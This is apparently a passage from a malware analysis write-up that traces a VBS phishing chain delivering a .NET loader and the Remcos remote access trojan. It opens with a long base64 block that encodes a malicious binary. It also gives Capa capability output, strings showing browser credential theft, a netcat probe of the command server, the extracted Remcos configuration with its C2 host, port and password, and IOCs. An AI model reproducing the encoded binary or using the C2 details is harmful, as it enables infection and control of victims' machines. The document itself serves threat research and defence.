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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAwAAACQNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

which decoded from base64 looks to be a binary file (the hash for this file was not found on VT).

A quick look at this file saved from CyberChef with strings was interesting but not fruitful per se. The output showed that there were references to both ‘Maracaibo’ and ‘MsqBIbY’, but nothing else really. This told me that I would have to take a look at this file in dnSpy to see what was really going on.

Moving further down on the script where the other URL is located – it looked to be some API calls that I have not seen before (or at least that I can remember), in particular ‘[system.AppDomain]::CurrentDomain.Load’,  ‘GetType’, ‘GetMethod’, and ‘Invoke’. A quick Google of ‘[system.AppDomain]::CurrentDomain.Load’ I was able to find this Microsoft page giving some insight into what the API calls where doing in the script. The crux of this looked to be loading and running some code in memory.

I also come across some other links from Fortinet back in 2021 that went over what looks to be a similar tatic for some malspam that delivered Agent Tesla back then.

• https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant
• https://www.avfirewalls.com/60359/breaking-new-phishing-malware-targets-bitcoin-addresses-heres-how-you-can-prevent-it

Fortinet discussed the code above being leveraged for process hallowing which makes sense considering the different API calls being made. It made even more sense since one of the alerts from the initial VB script was for a process injection using ‘Regsvcs.exe’.

So now knowing that there is some level of memory shenanigans going on here, it was time to see what goodies the other URL (hxxps://paste[.]ee/d/WRBwK/0) had.

Using curl for the URL the hxxps://paste[.]ee/d/WRBwK/0 URL gave me back the following:

which then I promptly put into CyberChef. CyberChef decided not to give me back anything useful and the issues that I had with recipe was flawed. Thankfully @kaspertame threw me a life line and helped correct my mis-step. The issues here were because:

1. I had left ‘remove null bytes’ in my CyberChef recipe
2. I didn’t realize that I needed to use ‘reverse’ within CyberChef to format the data correctly
   1. Granted there was nothing in the script that would allude one to use the reverse recipe. More on this here in a bit.

Once I got things figured out in CyberChef, I was able to download the binary and cross check the hash on VT to see if it was a known hash – which it definitely was.

I also did the same thing that I did with the other one and used strings to see what I could gather quickly from that output. Pretty quickly the strings output gave up some great details – especially the fact that someone was really proud of this being Remcos.

Doing a couple of quick grep searches with strings was pretty interesting as well.

- strings paste.ee.exe | grep "^\[.*"
[End of clipboard]
[Ctrl+V]
[Text pasted from clipboard]
[Ctrl+
[AltL]
[AltR]
[CtrlL]
[CtrlR]
[End of clipboard]
[Text copied to clipboard]
[Chrome StoredLogins not found]
[Chrome StoredLogins found, cleared!]
[Chrome Cookies not found]
[Chrome Cookies found, cleared!]
[Firefox StoredLogins not found]
[Firefox StoredLogins Cleared!]
[Firefox Cookies not found]
[Firefox cookies found, cleared!]
[IE cookies not found]
[IE cookies cleared!]
[Cleared browsers logins and cookies.]

- strings paste.ee.exe | grep "AppData.*"
\AppData\Local\Google\Chrome\User Data\Default\Login Data
\AppData\Local\Google\Chrome\User Data\Default\Cookies
\AppData\Roaming\Mozilla\Firefox\Profiles\

File Analysis
===========

Switching gears, I moved the two files that I was able to pull down from the two URLs seen in the script on to my VM. Opening the first file from the pasteio.com site using dnSPy and looking for ‘Maracaibo.Class1’ and the method ‘MsqBIbY’ gave all kinds of great information. Information that I could make educated assumptions about (ie: seeing the code for what I can only assume is the reverse function for the second URL as seen below, hence why it was not included in the script), but nothing that I could really dig further into due to the lack of skills here.

As a side note: @IzzyBoopFPV pointed out to me when we were talking about this, “das sum sussy baka shit right there [sic]”.

With the other binary downloaded from the paste.ee URL, I did not see anything there unfortunately within dnSpy. I did run it through Capa and got the following back from it.

Capability Namespace 
==========================
check for software breakpoints - anti-analysis/anti-debugging/debugger-detection 
self delete - anti-analysis/anti-forensic/self-deletion 
get geographical location - collection 
gather firefox profile information (2 matches) - collection/browser 
log keystrokes via application hook (2 matches) - collection/keylog 
log keystrokes via polling (3 matches) - collection/keylog 
capture microphone audio (4 matches) - collection/microphone 
capture screenshot - collection/screenshot 
receive data (7 matches) - communication 
send data (2 matches) - communication 
create reverse shell - communication/c2/shell 
execute shell command and capture output - communication/c2/shell 
resolve DNS - communication/dns 
create two anonymous pipes - communication/named-pipe/create 
initialize Winsock library - communication/socket 
encode data using Base64 - data-manipulation/encoding/base64 
encode data using XOR (16 matches) - data-manipulation/encoding/xor 
encrypt data using AES (3 matches) - data-manipulation/encryption/aes 
reference AES constants - data-manipulation/encryption/aes 
encrypt data using OpenSSL ECDSA - data-manipulation/encryption/ecdsa 
encrypt data using RC4 KSA - data-manipulation/encryption/rc4 
encrypt data using RC4 PRGA - data-manipulation/encryption/rc4 
hash data using SHA256 (2 matches) - data-manipulation/hashing/sha256 
authenticate HMAC - data-manipulation/hmac 
generate random numbers via WinAPI - data-manipulation/prng 
contain a thread local storage (.tls) section - executable/pe/section/tls 
extract resource via kernel32 functions - executable/resource 
read clipboard data (5 matches) - host-interaction/clipboard 
write clipboard data (2 matches) - host-interaction/clipboard 
query environment variable - host-interaction/environment-variable 
set environment variable (2 matches) - host-interaction/environment-variable 
get common file path (2 matches) - host-interaction/file-system 
copy file - host-interaction/file-system/copy 
create directory (5 matches) - host-interaction/file-system/create 
delete directory (3 matches) - host-interaction/file-system/delete 
delete file (15 matches) - host-interaction/file-system/delete 
check if file exists (16 matches) - host-interaction/file-system/exists 
enumerate files recursively (3 matches) - host-interaction/file-system/files/list 
get file attributes (2 matches) - host-interaction/file-system/meta 
set file attributes (10 matches) - host-interaction/file-system/meta 
move file (2 matches) - host-interaction/file-system/move 
read file on Windows (4 matches) - host-interaction/file-system/read 
read file via mapping - host-interaction/file-system/read 
write file on Windows (6 matches) - host-interaction/file-system/write 
enumerate gui resources - host-interaction/gui 
change the wallpaper - host-interaction/gui/session 
get graphical window text (4 matches) - host-interaction/gui/window/get-text 
hide graphical window (7 matches) - host-interaction/gui/window/hide 
get keyboard layout (2 matches) - host-interaction/hardware/keyboard 
enumerate disk volumes - host-interaction/hardware/storage 
get disk information (3 matches) - host-interaction/hardware/storage 
check mutex - host-interaction/mutex 
check mutex and exit (3 matches) - host-interaction/mutex 
shutdown system (2 matches) - host-interaction/os 
get system information on Windows - host-interaction/os/info 
create process on Windows (16 matches) - host-interaction/process/create 
use process replacement - host-interaction/process/inject 
enumerate processes (2 matches) - host-interaction/process/list 
modify access privileges - host-interaction/process/modify 
terminate process (14 matches) - host-interaction/process/terminate 
query or enumerate registry key (2 matches) - host-interaction/registry 
query or enumerate registry value (7 matches) - host-interaction/registry 
set registry value (7 matches) - host-interaction/registry/create 
delete registry key (2 matches) - host-interaction/registry/delete 
delete registry value - host-interaction/registry/delete 
continue service - host-interaction/service 
pause service - host-interaction/service 
query service status - host-interaction/service 
enumerate services - host-interaction/service/list 
modify service - host-interaction/service/modify 
start service (2 matches) - host-interaction/service/start 
stop service (2 matches) - host-interaction/service/stop 
get session user name - host-interaction/session 
get installed programs - host-interaction/software 
create thread (22 matches) - host-interaction/thread/create 
terminate thread (2 matches) - host-interaction/thread/terminate 
bypass UAC via ICMLuaUtil - host-interaction/uac/bypass 
link many functions at runtime (2 matches) - linking/runtime-linking 
linked against CPP standard library - linking/static 
enumerate PE sections - load-code/pe 
parse PE header (2 matches) - load-code/pe 
resolve function by parsing PE exports (6 matches) - load-code/pe 
persist via Run registry key (4 matches) - persistence/registry/run

I exported these files and have included them in the Github repo for this investigation for anyone that wants to take a crack at them.

Host Analysis
=============

Now that the files have been obtained and I have a good idea of what is going on via the script and what to look for, it was time to see what happened when actually running it in my VM and what happened at the network layer.

The first attempt was done using the script as that seemed like the path of least resistance. Unfortunately this was not the case and the script bombed out. Looking at Wireshark I could see the calls made by the script to the two URLs, but I ended up getting a reset back from the hosts (not shown here) which was the end of that.

For grins, I thought that I would look at Conversations within Wireshark to see if any “odd” ports may have been used. Nope, nada.

Next up was running the binary files themselves starting with the binary from pasteio.com. As soon as I executed the file, MS AV popped up and let me know that it had stopped the execution of something bad even though MAV was disabled for real-time scanning. Looking at ProcMon and filtering for any created or ended processes I could see that as soon as it was created it ended.

Looking at Wireshark this time gave me a small surprise – two outbound calls for the following domains not seen before:

• rds[.]accesscam[.]org / 185.174.101.214
• geoplugin.net/json.gp which returned info on the IP address seen from the VM

Taking this and cross-referencing against Sysmon logs I was able to validate that the binary from pasteio.com made the calls.

Since I didn’t get much from the pasteio.exe binary, I switched to the binary from the paste.ee domain and ran that. This time the activity within the VM was much more promising. I got the same call outs to the two domains listed above, but also a small stream of traffic to the rds[.]accesscam[.]org domain (178[.]237[.]33[.]50) on port 6620 as seen in the conversations below.

Note: As a side, the port 6620 looks to be related to tcp/kftp-data. 

The only thing that I can assume on the network level is that the communication between the VM and port 6620 is dormant and nothing is really going on (almost like a heart beat) and that the VM is waiting for commands from the server. I also checked both Shodan and Censys to see if this port was seen at either place and neither had any information about this port. Granted using netcat (nc -v rdm.accesscam.org 6620) from terminal told me that I had connected successfully. So who knows.

Now considering the binary did not need to use the process hollowing technique to run on the system, the persistence mechanism was not created. When doing a quick scan of the registry and filesystem for anything modified/created by the process, the anything that I saw was the binary playing with the registry and NOTHING on on the filesystem:

Also looking at the Sysmon events again I did not see anything else that stood out with what I saw mentioned above.

The last thing that I wanted to attempt was to pull the config out of the binary since based on others (ie: Jai‘s most excellent post about this very thing which can be read here) it looked pretty easy to do. In this case it took a couple of tries (which I am still not sure how I messed up since the working one looked like the others), but I did finally manage to pull it out.

I have also cleaned up the config file a bit for ease of copy/pasta.

C2 Host: rdm.accesscam.org
Port: 6620
Password: 1
Botnet: Hpp
Mutex: Rmc-NAGSJO

rdm.accesscam.org:6620:1|Hpp|1|1|100000||8|remcos.exe|0|Rmc-NAGSJO|0|8|logs.dat|10|5|6|Screenshots|5|MicRecords||0|0|0|1|Remcos|remcos|5722EFB615BBED358FD19DBBAECDA904

IOCs
=====

URL: hxxps://hidrive[.]ionos.com/lnk/SBBJoDne#file [VT] [URLHaus]
URL: hxxps://textbin[.]net/raw/ezjmofz3s6 – [VT] [URLHaus]
URL: hxxps://pasteio[.]com/download/xNVOEKuDyLXR [VT] [URLHaus]
URL: hxxps://paste[.]ee/d/WRBwK/0 [VT] [URLHaus]
Domain: rdm[.]accesscam[.]org:6620 [VT] [URLHaus]
URL: geoplugin[.]net/json.gp [VT] [URLHaus]
IP: 185[.]174[.]101[.]214 [VT] [URLHaus]
Scanned-2023Reports.vbs: b116f7ca8259e5ea9a53651a84d32ade6cb96c24a97f5d8f7eb6cb6e95a771f
paste.ee.exe: 288a045071388145c559b70d4fc7ff27baae2a3fda629d88a5da8e47ad9ee1ae [VT]
pasteio.com.exe: c92b586ab278e4d0390629f9039182d9d012e49605db44fb90db56951693a1be